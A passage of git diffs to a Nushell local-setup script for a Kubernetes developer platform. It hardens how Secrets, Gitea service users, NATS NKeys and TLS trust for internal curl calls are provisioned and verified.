-        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o $"jsonpath={.data.($key)}"
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o json
     } | complete)
     if $readback.exit_code != 0 {
         error make {msg: $"Failed to verify the persisted secret ($namespace)/($name)"}
     }
-    let persisted = (try { $readback.stdout | str trim | decode base64 | decode utf-8 } catch { "" })
+    let persisted = (try {
+        let secret = ($readback.stdout | from json)
+        $secret.data | get $key | decode base64 | decode utf-8
+    } catch { "" })
     if ($persisted | is-empty) or ($persisted != $value) {
         error make {msg: $"Persisted secret ($namespace)/($name) did not match its source"}
     }

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -738,6 +738,7 @@ type: kubernetes.io/service-account-token" | save --force $token_secret_file
 
     # Messaging namespace (for NATS server + Surveyor)
     kubectl create namespace messaging --dry-run=client -o yaml | kubectl apply -f -
+    ensure_nats_jetstream_controller_nkey
 
     kubectl create namespace tracing --dry-run=client -o yaml | kubectl apply -f -
 
@@ -1275,6 +1276,44 @@ def print_sync_diagnostics [state: record] {
     }
 }
 
+# crossplane-harbor-bootstrap contains provider-http Request objects. Argo sync
+# waves order Application creation only; they do not prove that package CRDs
+# have been installed. Gate the first Request on the active revision and CRD.
+def wait_for_provider_http_ready [] {
+    print "  Waiting for provider-http ProviderRevision and Request CRD..."
+    for attempt in 1..180 {
+        let provider_result = (do {
+            kubectl get provider provider-http -o json
+        } | complete)
+        if $provider_result.exit_code == 0 {
+            let provider = (try { $provider_result.stdout | from json } catch { {} })
+            let revision = ($provider | get -o status.currentRevision | default "")
+            if not ($revision | is-empty) {
+                let revision_result = (do {
+                    kubectl get providerrevision $revision -o json
+                } | complete)
+                if $revision_result.exit_code == 0 {
+                    let revision_state = (try { $revision_result.stdout | from json } catch { {} })
+                    let desired = ($revision_state | get -o spec.desiredState | default "Active")
+                    let conditions = ($revision_state | get -o status.conditions | default [])
+                    let healthy = ($conditions | any {|c| ((($c | get -o type | default "") == "Healthy") and (($c | get -o status | default "") == "True")) })
+                    if ($desired == "Active") and $healthy {
+                        let crd_result = (do {
+                            kubectl wait --for=condition=Established crd/requests.http.crossplane.io --timeout=5s
+                        } | complete)
+                        if $crd_result.exit_code == 0 {
+                            print "  ✓ provider-http is Healthy and requests.http.crossplane.io is Established"
+                            return
+                        }
+                    }
+                }
+            }
+        }
+        sleep 2sec
+    }
+    error make {msg: "provider-http did not become Healthy with an Established Request CRD"}
+}
+
 # Explicitly promote gated major upgrades on the disposable local KinD cluster.
 # Shared/production clusters must follow docs/guides/platform-versions.md instead.
 #
@@ -1289,7 +1328,8 @@ def sync_gated_apps_for_local_dev [] {
     let gated_apps = [
         "external-secrets", "nats", "grafana", "opencost", "gitea",
         "sonarqube", "crossplane", "crossplane-providers",
-        "crossplane-provider-configs", "crossplane-xrds", "core-catalog"
+        "crossplane-provider-configs", "crossplane-harbor-bootstrap",
+        "crossplane-xrds", "core-catalog"
     ]
     let sync_payload = '{"operation":{"sync":{"prune":true,"syncOptions":["CreateNamespace=true","ServerSideApply=true"]}}}'
     let max_operation_retries = 3
@@ -1297,6 +1337,9 @@ def sync_gated_apps_for_local_dev [] {
     print ""
     print $"(ansi cyan_bold)Promoting gated upgrades sequentially on local KinD(ansi reset)"
     for app in $gated_apps {
+        if $app == "crossplane-harbor-bootstrap" {
+            wait_for_provider_http_ready
+        }
         mut exists = false
         for attempt in 1..60 {
             let get_result = (do {
@@ -1940,33 +1983,76 @@ def wait_for_configuration_dependencies [phase: string, apps: list, certificates
     error make {msg: $"($phase) configuration dependencies did not become ready: ($bounded)"}
 }
 
-# Generic single-key opaque Secret writer (Issue #285). The value travels only
-# over stdin into `kubectl apply -f -` — never as a CLI argument, an env var
-# dump, or a plain file — and is read back and compared before returning, so a
-# transport/persistence failure is caught here rather than surfacing later as
-# an unexplained provider-http/Argo authentication failure. Used for every new
-# least-privilege credential this issue introduces (Crossplane's Gitea/Harbor
-# provisioning identities); pre-existing secrets keep their own call sites.
+# Remove client-side apply's credential-bearing metadata copy. Removal is safe
+# when the annotation is already absent and is verified without reading data.
+def scrub_secret_last_applied_annotation [namespace: string, name: string] {
+    let scrub_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH annotate secret $name -n $namespace kubectl.kubernetes.io/last-applied-configuration- --overwrite
+    } | complete)
+    if $scrub_result.exit_code != 0 {
+        error make {msg: $"Failed to scrub client-side apply metadata from secret ($namespace)/($name)"}
+    }
+    let annotation_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o jsonpath='{.metadata.annotations.kubectl\.kubernetes\.io/last-applied-configuration}'
+    } | complete)
+    if ($annotation_result.exit_code != 0) or (not ($annotation_result.stdout | str trim | is-empty)) {
+        error make {msg: $"Secret ($namespace)/($name) still contains client-side apply metadata"}
+    }
+}
+
+# Generic single-key opaque Secret writer (Issue #285). Existing Secrets are
+# read in-memory and their complete data map is submitted through server-side
+# apply, so unrelated keys survive the client-side-to-SSA ownership migration.
+# New Secrets start from a one-key manifest. No credential enters argv or disk.
 def persist_opaque_secret [namespace: string, name: string, key: string, value: string] {
     if ($value | is-empty) {
         error make {msg: $"Refusing to persist an empty value for secret ($namespace)/($name) key ($key)"}
     }
-    let manifest = ({
-        apiVersion: "v1"
-        kind: "Secret"
-        metadata: {name: $name, namespace: $namespace}
-        type: "Opaque"
-        data: {($key): ($value | encode base64)}
-    } | to json)
+    let encoded = ($value | encode base64)
+    let current_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o json --ignore-not-found
+    } | complete)
+    if $current_result.exit_code != 0 {
+        error make {msg: $"Failed to inspect secret ($namespace)/($name) before persisting key ($key)"}
+    }
+
+    let manifest = if ($current_result.stdout | str trim | is-empty) {
+        {
+            apiVersion: "v1"
+            kind: "Secret"
+            metadata: {name: $name, namespace: $namespace}
+            type: "Opaque"
+            data: {($key): $encoded}
+        }
+    } else {
+        let current = (try { $current_result.stdout | from json } catch {
+            error make {msg: $"Secret ($namespace)/($name) returned invalid JSON"}
+        })
+        mut metadata = {name: $name, namespace: $namespace}
+        let labels = ($current | get -o metadata.labels | default {})
+        if not ($labels | is-empty) { $metadata = ($metadata | insert labels $labels) }
+        let annotations = ($current | get -o metadata.annotations | default {} | reject --optional "kubectl.kubernetes.io/last-applied-configuration")
+        if not ($annotations | is-empty) { $metadata = ($metadata | insert annotations $annotations) }
+        let owners = ($current | get -o metadata.ownerReferences | default [])
+        if not ($owners | is-empty) { $metadata = ($metadata | insert ownerReferences $owners) }
+        let finalizers = ($current | get -o metadata.finalizers | default [])
+        if not ($finalizers | is-empty) { $metadata = ($metadata | insert finalizers $finalizers) }
+        {
+            apiVersion: "v1"
+            kind: "Secret"
+            metadata: $metadata
+            type: ($current | get -o type | default "Opaque")
+            data: ($current | get -o data | default {} | upsert $key $encoded)
+        }
+    }
     let apply_result = (do {
-        $manifest | kubectl --kubeconfig $KUBECONFIG_PATH apply -f -
+        $manifest | to json | kubectl --kubeconfig $KUBECONFIG_PATH apply --server-side --force-conflicts --field-manager digiorg-bootstrap-secret -f -
     } | complete)
     if $apply_result.exit_code != 0 {
         error make {msg: $"Failed to persist secret ($namespace)/($name)"}
     }
+    scrub_secret_last_applied_annotation $namespace $name
 
-    # Read back and compare without printing either value (portable across
-    # Linux/macOS/Windows hosts, same discipline as persist_gitea_bootstrap_token).
     let readback = (do {
         kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o $"jsonpath={.data.($key)}"
     } | complete)
@@ -1979,18 +2065,16 @@ def persist_opaque_secret [namespace: string, name: string, key: string, value: 
     }
 }
 
-# Write (or resume-preserve) the Argo CD repository-credential Secret for a
-# private Gitea repo. Matches Argo CD's documented repository Secret shape
-# (`argocd.argoproj.io/secret-type: repository` label); url/username/password
-# all travel over stdin, never argv. Resume-safe: if the Secret already
-# exists, it is left untouched (rotation is an explicit operator action, same
-# policy as gitea-admin-secret).
+# Write (or resume-preserve) the Argo CD repository credential. Existing
+# credentials are not rotated implicitly, but stale client-side metadata is
+# removed on every run.
 def persist_argocd_repo_secret [name: string, repo_url: string, username: string, password: string] {
     if ($password | is-empty) {
         error make {msg: $"Refusing to persist an empty password for ArgoCD repo credential ($name)"}
     }
     let existing = ((do -i { kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n argocd } | complete).exit_code == 0)
     if $existing {
+        scrub_secret_last_applied_annotation "argocd" $name
         print $"(ansi yellow)✓ ArgoCD repository credential '($name)' already present — preserved(ansi reset)"
         return
     }
@@ -2010,11 +2094,12 @@ def persist_argocd_repo_secret [name: string, repo_url: string, username: string
         }
     } | to json)
     let apply_result = (do {
-        $manifest | kubectl --kubeconfig $KUBECONFIG_PATH apply -f -
+        $manifest | kubectl --kubeconfig $KUBECONFIG_PATH apply --server-side --force-conflicts --field-manager digiorg-bootstrap-argocd-repository -f -
     } | complete)
     if $apply_result.exit_code != 0 {
         error make {msg: $"Failed to persist ArgoCD repository credential ($name)"}
     }
+    scrub_secret_last_applied_annotation "argocd" $name
     let readback = (do {
         kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n argocd -o jsonpath='{.data.password}'
     } | complete)
@@ -2025,6 +2110,68 @@ def persist_argocd_repo_secret [name: string, repo_url: string, username: string
     if ($persisted | is-empty) or ($persisted != $password) {
         error make {msg: $"Persisted ArgoCD repository credential ($name) did not match its source"}
     }
+}
+
+# Generate or validate the dedicated NACK user NKey. The digest-pinned Linux
+# tool container works on Docker Engine/Desktop without a host nsc/nk install.
+# The private seed stays in memory and is passed to nk over stdin only.
+def ensure_nats_jetstream_controller_nkey [] {
+    let name = "nats-jetstream-controller-nkey"
+    let tool_image = "natsio/nats-box:0.19.2@sha256:8031d190c7ee24081f3f27cc939fb647a1eeb29ebb5c60fef9b5b6c7a846d6a2"
+    let exists = ((do -i {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n messaging -o name
+    } | complete).exit_code == 0)
+
+    if $exists {
+        let seed_result = (do {
+            kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n messaging -o jsonpath='{.data.seed\.nk}'
+        } | complete)
+        let public_result = (do {
+            kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n messaging -o jsonpath='{.data.public\.nk}'
+        } | complete)
+        if $seed_result.exit_code != 0 or $public_result.exit_code != 0 {
+            error make {msg: "Failed to read the persisted NATS controller NKey pair"}
+        }
+        let seed = (try { $seed_result.stdout | str trim | decode base64 | decode utf-8 } catch { "" })
+        let public = (try { $public_result.stdout | str trim | decode base64 | decode utf-8 } catch { "" })
+        if ($seed | is-empty) {
+            error make {msg: "Persisted NATS controller NKey seed is missing"}
+        }
+        let derived_result = (do {
+            $seed | docker run --rm -i $tool_image nk -inkey /dev/stdin -pubout
+        } | complete)
+        let derived = ($derived_result.stdout | str trim)
+        if ($derived_result.exit_code != 0) or (not ($derived | str starts-with "U")) {
+            error make {msg: "Persisted NATS controller seed is invalid"}
+        }
+        if ($public | is-empty) {
+            persist_opaque_secret "messaging" $name "public.nk" $derived
+            print "✓ Repaired missing NATS JetStream controller public NKey from persisted seed"
+        } else if $derived != $public {
+            error make {msg: "Persisted NATS controller seed does not match its public NKey"}
+        }
+        scrub_secret_last_applied_annotation "messaging" $name
+        print "✓ NATS JetStream controller NKey pair already present and verified"
+        return
+    }
+
+    let seed_result = (do {
+        docker run --rm $tool_image nk -gen user
+    } | complete)
+    let seed = ($seed_result.stdout | str trim)
+    if ($seed_result.exit_code != 0) or (not ($seed | str starts-with "SU")) {
+        error make {msg: "Failed to generate a NATS user seed"}
+    }
+    let public_result = (do {
+        $seed | docker run --rm -i $tool_image nk -inkey /dev/stdin -pubout
+    } | complete)
+    let public = ($public_result.stdout | str trim)
+    if ($public_result.exit_code != 0) or (not ($public | str starts-with "U")) {
+        error make {msg: "Failed to derive the NATS user public key"}
+    }
+    persist_opaque_secret "messaging" "nats-jetstream-controller-nkey" "seed.nk" $seed
+    persist_opaque_secret "messaging" "nats-jetstream-controller-nkey" "public.nk" $public
+    print "✓ Dedicated NATS JetStream controller NKey created"
 }
 
 def persist_gitea_bootstrap_token [token: string] {
@@ -2069,10 +2216,25 @@ def persist_gitea_bootstrap_token [token: string] {
 def gitea_create_user_random_password [gitea_pod: string, username: string, email: string, is_admin: bool] {
     let admin_flag = if $is_admin { "true" } else { "false" }
     let create_result = (do {
-        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user create --username "($username)" --email "($email)" --random-password --random-password-length 32 --must-change-password false --admin ($admin_flag)'
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user create --username "($username)" --email "($email)" --random-password --random-password-length 32 --must-change-password=false --admin ($admin_flag)'
     } | complete)
     if $create_result.exit_code != 0 {
         error make {msg: $"Failed to create the Gitea user ($username)"}
+    }
+}
+
+# Gitea's Bool flag requires --must-change-password=false at creation. Repair
+# identities created by older bootstraps as well; otherwise Git Smart HTTP with
+# a PAT is redirected to the interactive password-change page.
+def gitea_unset_service_user_must_change_password [gitea_pod: string, username: string] {
+    if not ($username =~ '^[a-z0-9][a-z0-9-]{0,38}$') {
+        error make {msg: "Refusing an invalid Gitea service username"}
+    }
+    let unset_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user must-change-password --unset "($username)"'
+    } | complete)
+    if $unset_result.exit_code != 0 {
+        error make {msg: $"Failed to clear must-change-password for Gitea service user ($username)"}
     }
 }
 
@@ -2400,6 +2562,7 @@ def configure_crossplane_gitea_credentials [gitea_pod: string, gitea_token: stri
     if not ($users_result.stdout | lines | any {|line| $line | str contains "crossplane-provisioner" }) {
         gitea_create_user_random_password $gitea_pod "crossplane-provisioner" "crossplane-provisioner@digiorg.local" false
     }
+    gitea_unset_service_user_must_change_password $gitea_pod "crossplane-provisioner"
 
     # Team scoped to repo creation + code push only -- no org administration,
     # no member/webhook management (can_create_org_repo is the specific Gitea
@@ -2480,6 +2643,7 @@ def configure_argocd_gitea_access [gitea_pod: string, gitea_token: string] {
     if not ($users_result.stdout | lines | any {|line| $line | str contains "argocd-reader" }) {
         gitea_create_user_random_password $gitea_pod "argocd-reader" "argocd-reader@digiorg.local" false
     }
+    gitea_unset_service_user_must_change_password $gitea_pod "argocd-reader"
 
     # Read-only collaborator on DigiOrg/app-config ONLY -- no org membership,
     # no other repository. Re-applied every run (idempotent PUT) so a resumed
@@ -2542,6 +2706,7 @@ def configure_backstage_gitea_publisher [gitea_pod: string, gitea_token: string]
     if not ($users_result.stdout | lines | any {|line| $line | str contains "backstage-appclaim-publisher" }) {
         gitea_create_user_random_password $gitea_pod "backstage-appclaim-publisher" "backstage-appclaim-publisher@digiorg.local" false
     }
+    gitea_unset_service_user_must_change_password $gitea_pod "backstage-appclaim-publisher"
 
     # Write collaborator on DigiOrg/app-config ONLY -- no org membership, no
     # other repository. Re-applied every run (idempotent PUT) so a resumed

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -72,6 +72,36 @@ def "main up" [] {
         {namespace: "cert-manager", name: "digiorg-local-ca"}
         {namespace: "ingress-nginx", name: "digiorg-local-tls"}
     ]
+
+    # Issue #285 (TLS hardening): copy only the public digiorg.local CA
+    # certificate (never cert-manager's private key) into every namespace
+    # running a client that must verify the digiorg.local ingress's
+    # certificate -- crossplane-system (provider-http's shared
+    # ProviderConfig), backstage (NODE_EXTRA_CA_CERTS) and gitea (the
+    # Actions runner's own trust + its embedded dockerd's registry trust).
+    # Idempotent, so safe on both a first bootstrap and a resumed run.
+    print "Copying the digiorg.local CA into consumer namespaces..."
+    copy_digiorg_local_ca_to_namespace "crossplane-system"
+    copy_digiorg_local_ca_to_namespace "backstage"
+    # Harbor PostSync hooks mount this Secret optionally and wait for ca.crt,
+    # avoiding a sync deadlock while keeping admin credentials off plaintext HTTP.
+    copy_digiorg_local_ca_to_namespace "harbor"
+    let gitea_ca_changed = (copy_digiorg_local_ca_to_namespace "gitea")
+
+    # A resumed run may be updating an already-registered CA on an
+    # already-running runner: restart it *before* configure_gitea runs, not
+    # after. configure_gitea calls configure_gitea_actions_runner, which
+    # unconditionally calls wait_for_gitea_actions_runner_online -- an
+    # already-running runner pod's cached TLS trust does not pick up a
+    # rotated CA without a restart, so polling it for "online" before
+    # restarting deadlocks until the wait's own timeout, even though the
+    # restart later in the run would have fixed it. On a fresh bootstrap the
+    # runner is either not yet scheduled or still waiting on other Phase-3
+    # secrets, so this is a harmless no-op/short wait.
+    if $gitea_ca_changed {
+        restart_oidc_deployment_if_present "gitea" "gitea-actions-runner" "120s"
+    }
+
     configure_gitea
 
     # Configure SonarQube only after its direct Applications and the same local
@@ -687,6 +717,16 @@ type: kubernetes.io/service-account-token" | save --force $token_secret_file
         --dry-run=client -o yaml | kubectl apply -f -)
     persist_harbor_oidc_secret $harbor_oidc_secret
 
+    # Issue #285: precomputed HTTP Basic-auth value for the Harbor admin
+    # identity, consumed only by the declarative, one-time
+    # crossplane-harbor-bootstrap Request (crossplane/bootstrap/harbor-robot-request.yaml)
+    # to create the least-privilege crossplane-system system robot. provider-http's
+    # `{{ name:namespace:key }}` templating substitutes a secret value verbatim
+    # (it does not encode), so the base64(admin:password) pair is computed once
+    # here, kept out of argv/logs, and never reused as a per-app credential.
+    let harbor_admin_basic = ($"admin:($harbor_admin_password)" | encode base64)
+    persist_opaque_secret "harbor" "harbor-admin-basic-auth" "value" $harbor_admin_basic
+
     # Messaging namespace (for NATS server + Surveyor)
     kubectl create namespace messaging --dry-run=client -o yaml | kubectl apply -f -
 
@@ -873,7 +913,7 @@ def deploy_root_app [] {
     print "  Wave  1: keycloak, argocd (self-managed)"
     print "  Wave  2: backstage, gitea, grafana, harbor, jaeger, landingpage, opencost, sonarqube"
     print "  Wave  3: crossplane, kyverno"
-    print "  Wave  4: crossplane-providers, fluentd, kyverno-policies"
+    print "  Wave  4: crossplane-providers, fluentd, kyverno-policies, gitea-actions-runner"
     print "  Wave  5: monitoring-extras (ServiceMonitors)"
     print "  Wave  6: crossplane-provider-configs"
     print "  Wave  7: crossplane-xrds"
@@ -1720,22 +1760,24 @@ def wait_for_argocd_apps [] {
         # Wave 0
         "cert-manager", "external-secrets", "nats", "postgresql", "opensearch",
         # Wave 1
-        "keycloak", "argocd",
+        "keycloak", "argocd", "nats-jetstream-controller",
         # Wave 2
         "backstage", "gitea", "grafana", "harbor", "jaeger", "landingpage", "opencost", "sonarqube",
         # Wave 3
         "crossplane", "kyverno",
         # Wave 4
-        "crossplane-providers", "fluentd", "kyverno-policies",
+        "crossplane-providers", "fluentd", "kyverno-policies", "gitea-actions-runner",
         # Wave 5
         "monitoring-extras",
         # Wave 6
         "crossplane-provider-configs",
         # Wave 7
-        "crossplane-xrds",
+        "crossplane-xrds", "crossplane-harbor-bootstrap",
         # Wave 8
-        "core-catalog"
+        "core-catalog",
         # Wave 9/10 (cnpg, cnpg-cluster) intentionally excluded — see above.
+        # Wave 11
+        "app-config",
     ]
 
     mut all_healthy = false
@@ -1889,6 +1931,93 @@ def wait_for_configuration_dependencies [phase: string, apps: list, certificates
     error make {msg: $"($phase) configuration dependencies did not become ready: ($bounded)"}
 }
 
+# Generic single-key opaque Secret writer (Issue #285). The value travels only
+# over stdin into `kubectl apply -f -` — never as a CLI argument, an env var
+# dump, or a plain file — and is read back and compared before returning, so a
+# transport/persistence failure is caught here rather than surfacing later as
+# an unexplained provider-http/Argo authentication failure. Used for every new
+# least-privilege credential this issue introduces (Crossplane's Gitea/Harbor
+# provisioning identities); pre-existing secrets keep their own call sites.
+def persist_opaque_secret [namespace: string, name: string, key: string, value: string] {
+    if ($value | is-empty) {
+        error make {msg: $"Refusing to persist an empty value for secret ($namespace)/($name) key ($key)"}
+    }
+    let manifest = ({
+        apiVersion: "v1"
+        kind: "Secret"
+        metadata: {name: $name, namespace: $namespace}
+        type: "Opaque"
+        data: {($key): ($value | encode base64)}
+    } | to json)
+    let apply_result = (do {
+        $manifest | kubectl --kubeconfig $KUBECONFIG_PATH apply -f -
+    } | complete)
+    if $apply_result.exit_code != 0 {
+        error make {msg: $"Failed to persist secret ($namespace)/($name)"}
+    }
+
+    # Read back and compare without printing either value (portable across
+    # Linux/macOS/Windows hosts, same discipline as persist_gitea_bootstrap_token).
+    let readback = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o $"jsonpath={.data.($key)}"
+    } | complete)
+    if $readback.exit_code != 0 {
+        error make {msg: $"Failed to verify the persisted secret ($namespace)/($name)"}
+    }
+    let persisted = (try { $readback.stdout | str trim | decode base64 | decode utf-8 } catch { "" })
+    if ($persisted | is-empty) or ($persisted != $value) {
+        error make {msg: $"Persisted secret ($namespace)/($name) did not match its source"}
+    }
+}
+
+# Write (or resume-preserve) the Argo CD repository-credential Secret for a
+# private Gitea repo. Matches Argo CD's documented repository Secret shape
+# (`argocd.argoproj.io/secret-type: repository` label); url/username/password
+# all travel over stdin, never argv. Resume-safe: if the Secret already
+# exists, it is left untouched (rotation is an explicit operator action, same
+# policy as gitea-admin-secret).
+def persist_argocd_repo_secret [name: string, repo_url: string, username: string, password: string] {
+    if ($password | is-empty) {
+        error make {msg: $"Refusing to persist an empty password for ArgoCD repo credential ($name)"}
+    }
+    let existing = ((do -i { kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n argocd } | complete).exit_code == 0)
+    if $existing {
+        print $"(ansi yellow)✓ ArgoCD repository credential '($name)' already present — preserved(ansi reset)"
+        return
+    }
+    let manifest = ({
+        apiVersion: "v1"
+        kind: "Secret"
+        metadata: {
+            name: $name
+            namespace: "argocd"
+            labels: {"argocd.argoproj.io/secret-type": "repository"}
+        }
+        type: "Opaque"
+        data: {
+            url: ($repo_url | encode base64)
+            username: ($username | encode base64)
+            password: ($password | encode base64)
+        }
+    } | to json)
+    let apply_result = (do {
+        $manifest | kubectl --kubeconfig $KUBECONFIG_PATH apply -f -
+    } | complete)
+    if $apply_result.exit_code != 0 {
+        error make {msg: $"Failed to persist ArgoCD repository credential ($name)"}
+    }
+    let readback = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n argocd -o jsonpath='{.data.password}'
+    } | complete)
+    if $readback.exit_code != 0 {
+        error make {msg: $"Failed to verify the persisted ArgoCD repository credential ($name)"}
+    }
+    let persisted = (try { $readback.stdout | str trim | decode base64 | decode utf-8 } catch { "" })
+    if ($persisted | is-empty) or ($persisted != $password) {
+        error make {msg: $"Persisted ArgoCD repository credential ($name) did not match its source"}
+    }
+}
+
 def persist_gitea_bootstrap_token [token: string] {
     if ($token | is-empty) {
         error make {msg: "Refusing to persist an empty Gitea bootstrap token"}
@@ -1919,6 +2048,22 @@ def persist_gitea_bootstrap_token [token: string] {
     let persisted = (try { $readback.stdout | str trim | decode base64 | decode utf-8 } catch { "" })
     if ($persisted | is-empty) or ($persisted != $token) {
         error make {msg: "Persisted Gitea bootstrap token did not match its source"}
+    }
+}
+
+# Create a Gitea user whose password is generated server-side by the `gitea`
+# CLI itself (`--random-password`) rather than interpolated into this exec's
+# process argument (Issue #285 blocker #3: a `ps`-visible generated password
+# on the node). The generated password is intentionally never captured or
+# printed -- every identity this helper creates authenticates solely via a
+# later admin-generated access token, so nothing of value is discarded.
+def gitea_create_user_random_password [gitea_pod: string, username: string, email: string, is_admin: bool] {
+    let admin_flag = if $is_admin { "true" } else { "false" }
+    let create_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH exec -n gitea $gitea_pod -c gitea -- su git -c $'gitea admin user create --username "($username)" --email "($email)" --random-password --random-password-length 32 --must-change-password false --admin ($admin_flag)'
+    } | complete)
+    if $create_result.exit_code != 0 {
+        error make {msg: $"Failed to create the Gitea user ($username)"}
     }
 }
 
@@ -2059,7 +2204,7 @@ def configure_gitea [] {
     # Create the organisation through the API so no CLI configuration needs the
     # administrative token in argv. Exact HTTP status handling is fail-closed.
     let org_check = (do {
-        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -sSk -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/orgs/DigiOrg'
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/orgs/DigiOrg'
     } | complete)
     if $org_check.exit_code != 0 {
         error make {msg: "Failed to query the DigiOrg organisation in Gitea"}
@@ -2069,7 +2214,7 @@ def configure_gitea [] {
         print $"(ansi yellow)✓ Organisation 'DigiOrg' already exists(ansi reset)"
     } else if $org_status == "404" {
         let org_create = (do {
-            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -sSk -o /dev/null -w "%{http_code}" -X POST -H "Content-Type: application/json" --data "{\"username\":\"DigiOrg\",\"full_name\":\"DigiOrg Organization\",\"visibility\":\"public\",\"repo_admin_change_team_access\":true}" https://digiorg.local/gitea/api/v1/orgs'
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" -X POST -H "Content-Type: application/json" --data "{\"username\":\"DigiOrg\",\"full_name\":\"DigiOrg Organization\",\"visibility\":\"public\",\"repo_admin_change_team_access\":true}" https://digiorg.local/gitea/api/v1/orgs'
         } | complete)
         if $org_create.exit_code != 0 or (($org_create.stdout | str trim) != "201") {
             error make {msg: "Failed to create the DigiOrg organisation in Gitea"}
@@ -2083,7 +2228,7 @@ def configure_gitea [] {
     # never embedded in a process argument or printed command; --fail turns
     # every HTTP 4xx/5xx response into a fail-closed command result.
     let teams_result = (do {
-        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -fsSk https://digiorg.local/gitea/api/v1/orgs/DigiOrg/teams'
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c 'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS https://digiorg.local/gitea/api/v1/orgs/DigiOrg/teams'
     } | complete)
 
     if $teams_result.exit_code != 0 {
@@ -2098,14 +2243,14 @@ def configure_gitea [] {
 
     # 4g: Add digiorgadmin to Owners team (idempotent)
     let admin_check = (do {
-        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -sSk -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgadmin'
+        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -sS -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgadmin'
     } | complete)
 
     if ($admin_check.exit_code == 0) and (($admin_check.stdout | str trim) == "200") {
         print $"(ansi yellow)✓ 'digiorgadmin' already member of Owners team(ansi reset)"
     } else {
         let admin_add = (do {
-            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -fsSk -X PUT https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgadmin'
+            $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - --cacert /usr/local/share/ca-certificates/digiorg-local-ca.crt -fsS -X PUT https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgadmin'
         } | complete)
         if $admin_add.exit_code == 0 {
             print $"(ansi green)✓ 'digiorgadmin' added to Owners team(ansi reset)"
@@ -2116,14 +2261,14 @@ def configure_gitea [] {
 
     # 4h: Add digiorgdeveloper to Owners team (idempotent)
     let dev_check = (do {
-        $gitea_token | kubectl --kubeconfig $KUBECONFIG_PATH exec -i -n gitea $gitea_pod -c gitea -- sh -c $'IFS= read -r token; printf "header = \"Authorization: token %s\"\n" "$token" | curl --config - -sSk -o /dev/null -w "%{http_code}" https://digiorg.local/gitea/api/v1/teams/($owners_team_id)/members/digiorgdeveloper'
